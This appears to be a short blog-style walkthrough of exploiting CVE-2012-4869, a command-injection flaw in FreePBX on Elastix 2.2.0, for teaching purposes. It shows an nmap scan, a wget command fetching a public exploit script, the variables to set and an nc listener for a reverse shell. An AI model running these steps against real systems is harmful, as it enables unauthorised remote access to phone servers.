lktniloc

Disclaimer

The following content is strictly for educational purpose. Please do not attempt exploitation of this vulnerability on any assets without ownership consent.

References and Links

• https://nvd.nist.gov/vuln/detail/CVE-2012-4869
• https://www.exploit-db.com/exploits/18650
• https://raw.githubusercontent.com/infosecjunky/FreePBX-2.10.0—Elastix-2.2.0—Remote-Code-Execution/master/exploit.py

Description

The callme_startcall function in recordings/misc/callme_page.php in FreePBX 2.9, 2.10, and earlier allows remote attackers to execute arbitrary commands via the callmenum parameter in a c action.

CWE

CWE-94 – Improper Control of Generation of Code (‘Code Injection’)

Exploitation Walkthrough

This section demonstrates the exploitation of this vulnerability.

1. Enumeration

First, we can perform an Nmap port scan to determine open ports, service versions and other interesting information such as OS information.

nmap -sS -p- -Pn -A -T4 -vv 10.xx.xx.x -oN 10.xx.xx.x.nmap

The following results indicates the presence of an Elastix 2.2.0 Web server.

|Open Ports  | Service      | Version                                                   
| 443        | https        | Elastix 2.2.0 
                

2. Exploitation

For the exploit code, I will be demonstrating using the exploit code from infosecjunkie.

The following command can be used to download the repo to your local system.

wget https://raw.githubusercontent.com/infosecjunky/FreePBX-2.10.0---Elastix-2.2.0---Remote-Code-Execution/master/exploit.py

Next, we modify the rhost, lhost, lport variables for the exploit.The rhost will be the target IP, lhost and lport will be your IP and listening port.

Next, we setup a listener for reverse connection via reverse shell.

nc -lvnp 4444

Lastly, we run the following command to execute the exploit on our target.

python3 exploit1.py